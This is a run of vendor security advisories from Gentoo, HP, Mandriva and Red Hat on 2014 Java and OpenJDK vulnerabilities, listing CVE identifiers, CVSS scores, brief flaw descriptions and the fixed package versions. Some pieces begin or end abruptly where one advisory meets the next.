http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423 [ 33 ] CVE-2014-2427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427 [ 34 ] CVE-2014-2428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2428 [ 35 ] CVE-2014-2483 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2483 [ 36 ] CVE-2014-2490 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2490 [ 37 ] CVE-2014-4208 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4208 [ 38 ] CVE-2014-4209 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4209 [ 39 ] CVE-2014-4216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4216 [ 40 ] CVE-2014-4218 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4218 [ 41 ] CVE-2014-4219 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4219 [ 42 ] CVE-2014-4220 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4220 [ 43 ] CVE-2014-4221 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4221 [ 44 ] CVE-2014-4223 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4223 [ 45 ] CVE-2014-4227 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4227 [ 46 ] CVE-2014-4244 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4244 [ 47 ] CVE-2014-4247 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4247 [ 48 ] CVE-2014-4252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4252 [ 49 ] CVE-2014-4262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4262 [ 50 ] CVE-2014-4263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4263 [ 51 ] CVE-2014-4264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4264 [ 52 ] CVE-2014-4265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4265 [ 53 ] CVE-2014-4266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4266 [ 54 ] CVE-2014-4268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4268 [ 55 ] CVE-2014-4288 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4288 [ 56 ] CVE-2014-6456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6456 [ 57 ] CVE-2014-6457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6457 [ 58 ] CVE-2014-6458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6458 [ 59 ] CVE-2014-6466 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6466 [ 60 ] CVE-2014-6468 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6468 [ 61 ] CVE-2014-6476 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6476 [ 62 ] CVE-2014-6485 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6485 [ 63 ] CVE-2014-6492 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6492 [ 64 ] CVE-2014-6493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6493 [ 65 ] CVE-2014-6502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6502 [ 66 ] CVE-2014-6503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6503 [ 67 ] CVE-2014-6504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6504 [ 68 ] CVE-2014-6506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6506 [ 69 ] CVE-2014-6511 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6511 [ 70 ] CVE-2014-6512 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6512 [ 71 ] CVE-2014-6513 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6513 [ 72 ] CVE-2014-6515 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6515 [ 73 ] CVE-2014-6517 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6517 [ 74 ] CVE-2014-6519 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6519 [ 75 ] CVE-2014-6527 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6527 [ 76 ] CVE-2014-6531 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6531 [ 77 ] CVE-2014-6532 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6532 [ 78 ] CVE-2014-6558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6558 [ 79 ] CVE-2014-6562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6562
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201502-12.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . In a typical operating environment, these are of low security risk as the runtime is not used on untrusted applets.
Release Date: 2014-08-19 Last Updated: 2014-08-19
Potential Security Impact: Remote unauthorized access, disclosure of information, and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in Java Runtime Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These vulnerabilities could allow remote unauthorized access, disclosure of information, and other vulnerabilities.
References:
CVE-2013-6629
CVE-2013-6954
CVE-2014-0432
CVE-2014-0446
CVE-2014-0448
CVE-2014-0449
CVE-2014-0451
CVE-2014-0452
CVE-2014-0453
CVE-2014-0454
CVE-2014-0455
CVE-2014-0456
CVE-2014-0458
CVE-2014-0459
CVE-2014-0460
CVE-2014-0461
CVE-2014-1876
CVE-2014-2397
CVE-2014-2398
CVE-2014-2401
CVE-2014-2402
CVE-2014-2403
CVE-2014-2409
CVE-2014-2412
CVE-2014-2413
CVE-2014-2414
CVE-2014-2420
CVE-2014-2421
CVE-2014-2422
CVE-2014-2423
CVE-2014-2427
CVE-2014-2428
CVE-2014-2483
CVE-2014-2490
CVE-2014-4208
CVE-2014-4209
CVE-2014-4216
CVE-2014-4218
CVE-2014-4220
CVE-2014-4221
CVE-2014-4223
CVE-2014-4244
CVE-2014-4252
CVE-2014-4262
CVE-2014-4263
CVE-2014-4264
CVE-2014-4265
CVE-2014-4266
CVE-2014-4268
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.23, and B.11.31 running HP JDK and JRE v7.0.09 and earlier.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2013-6629 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-6954 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-0432 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-0446 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2014-0449 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-0451 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0452 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0453 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0 CVE-2014-0454 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0455 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-0456 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-0458 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0459 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0460 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8 CVE-2014-0461 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-1876 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4 CVE-2014-2397 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-2398 (AV:N/AC:M/Au:S/C:N/I:P/A:N) 3.5 CVE-2014-2401 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-2402 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2403 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-2409 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2014-2412 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2413 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2014-2414 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2420 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6 CVE-2014-2421 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-2422 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-2423 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2428 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2014-2483 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-2490 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4208 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6 CVE-2014-4209 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2014-4216 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4218 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4220 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4221 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-4223 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4244 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0 CVE-2014-4252 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-4262 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4263 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0 CVE-2014-4264 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-4265 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4266 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4268 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these vulnerabilities.
The upgrade is available from the following location: http://www.hp.com/java
OS Version Release Version Depot Name
HP-UX B.11.23, B.11.31 JDK and JRE v7.0.10 or subsequent Itanium_JDK_JRE_7.0.10_Aug_2014_Java70_1.7.0.10.00_HP-UX_B.11.31_IA.depot
MANUAL ACTIONS: Yes - Update For Java v7.0 update to Java v7.0.10 or subsequent
PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.23 HP-UX B.11.31 =========== Jdk70.JDK70-COM Jdk70.JDK70-DEMO Jdk70.JDK70-IPF32 Jdk70.JDK70-IPF64 Jre70.JRE70-COM Jre70.JRE70-IPF32 Jre70.JRE70-IPF32-HS Jre70.JRE70-IPF64 Jre70.JRE70-IPF64-HS action: install revision 1.7.0.10.00 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 19 August 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
Note that the CVE-2014-0459 issue is in the lcms2 library, which has been patched to correct this flaw. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFTdfckmqjQ0CJFipgRArKEAKCIiAR2WkLo3Vb0gzzQ5RDz7hQZ3gCcDC6A 5xOtKkhOvonpLXoqBiAcXWQ= =qBk5 -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: java-1.6.0-openjdk security and bug fix update Advisory ID: RHSA-2014:0408-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0408.html Issue date: 2014-04-16 CVE Names: CVE-2014-0429 CVE-2014-0446 CVE-2014-0451 CVE-2014-0452 CVE-2014-0453 CVE-2014-0456 CVE-2014-0457 CVE-2014-0458 CVE-2014-0460 CVE-2014-0461 CVE-2014-1876 CVE-2014-2397 CVE-2014-2398 CVE-2014-2403 CVE-2014-2412 CVE-2014-2414 CVE-2014-2421 CVE-2014-2423 CVE-2014-2427 =====================================================================
- Summary:
Updated java-1.6.0-openjdk packages that fix various security issues and one bug are now available for Red Hat Enterprise Linux 5 and 6.
The Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux (v. 5 server) - i386, x86_64 Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
The java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Java Software Development Kit.
An input validation flaw was discovered in the medialib library in the 2D component. A specially crafted image could trigger Java Virtual Machine memory corruption when processed. A remote attacker, or an untrusted Java application or applet, could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. (CVE-2014-0429)
Multiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions. (CVE-2014-0456, CVE-2014-2397, CVE-2014-2421)
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2014-0457, CVE-2014-0461)
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. (CVE-2014-2412, CVE-2014-0451, CVE-2014-0458, CVE-2014-2423, CVE-2014-0452, CVE-2014-2414, CVE-2014-0446, CVE-2014-2427)
Multiple flaws were identified in the Java Naming and Directory Interface (JNDI) DNS client. These flaws could make it easier for a remote attacker to perform DNS spoofing attacks. (CVE-2014-0460)
It was discovered that the JAXP component did not properly prevent access to arbitrary files when a SecurityManager was present. This flaw could cause a Java application using JAXP to leak sensitive information, or affect application availability. (CVE-2014-2403)
It was discovered that the Security component in OpenJDK could leak some timing information when performing PKCS#1 unpadding. This could possibly lead to the disclosure of some information that was meant to be protected by encryption. (CVE-2014-0453)
It was discovered that the fix for CVE-2013-5797 did not properly resolve input sanitization flaws in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting (XSS) attacks. (CVE-2014-2398)
An insecure temporary file use flaw was found in the way the unpack200 utility created log files. A local attacker could possibly use this flaw to perform a symbolic link attack and overwrite arbitrary files with the privileges of the user running unpack200. (CVE-2014-1876)
This update also fixes the following bug:
- The OpenJDK update to IcedTea version 1.13 introduced a regression related to the handling of the jdk_version_info variable. This variable was not properly zeroed out before being passed to the Java Virtual Machine, resulting in a memory leak in the java.lang.ref.Finalizer class. This update fixes this issue, and memory leaks no longer occur. (BZ#1085373)
All users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1060907 - CVE-2014-1876 OpenJDK: insecure temporary file use in unpack200 (Libraries, 8033618) 1085373 - java.lang.ref.Finalizer leak when upgrading from 1.62 to 1.66 1086632 - CVE-2014-2398 OpenJDK: insufficient escaping of window title string (Javadoc, 8026736) 1086645 - CVE-2014-0453 OpenJDK: RSA unpadding timing issues (Security, 8027766) 1087409 - CVE-2014-0429 OpenJDK: Incorrect mlib/raster image validation (2D, 8027841) 1087411 - CVE-2014-0457 OpenJDK: ServiceLoader Exception handling security bypass (Libraries, 8031394) 1087413 - CVE-2014-0456 OpenJDK: System.arraycopy() element race condition (Hotspot, 8029858) 1087417 - CVE-2014-2421 OpenJDK: JPEG decoder input stream handling (2D, 8029854) 1087423 - CVE-2014-2397 OpenJDK: classfile parser invalid BootstrapMethods attribute length (Hotspot, 8034926) 1087426 - CVE-2014-0461 OpenJDK: Better ScriptEngineManager ScriptEngine management (Libraries, 8036794) 1087427 - CVE-2014-2412 OpenJDK: AWT thread context handling (AWT, 8025010) 1087428 - CVE-2014-0451 OpenJDK: AWT incorrect FlavorMap seperation (AWT, 8026797) 1087430 - CVE-2014-0458 OpenJDK: Activation framework default command map caching (JAX-WS, 8025152) 1087431 - CVE-2014-2414 OpenJDK: incorrect caching of data initialized via TCCL (JAXB, 8025030) 1087434 - CVE-2014-2423 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026188) 1087436 - CVE-2014-0452 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026801) 1087439 - CVE-2014-0446 OpenJDK: Protect logger handlers (Libraries, 8029740) 1087441 - CVE-2014-2427 OpenJDK: remove insecure Java Sound provider caching (Sound, 8026163) 1087442 - CVE-2014-0460 OpenJDK: missing randomization of JNDI DNS client query IDs (JNDI, 8030731) 1087443 - CVE-2014-2403 OpenJDK: JAXP CharInfo file access restriction (JAXP, 8029282)
- Package List:
Red Hat Enterprise Linux Desktop (v. 5 client):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.i386.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.i386.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm
Red Hat Enterprise Linux Desktop (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
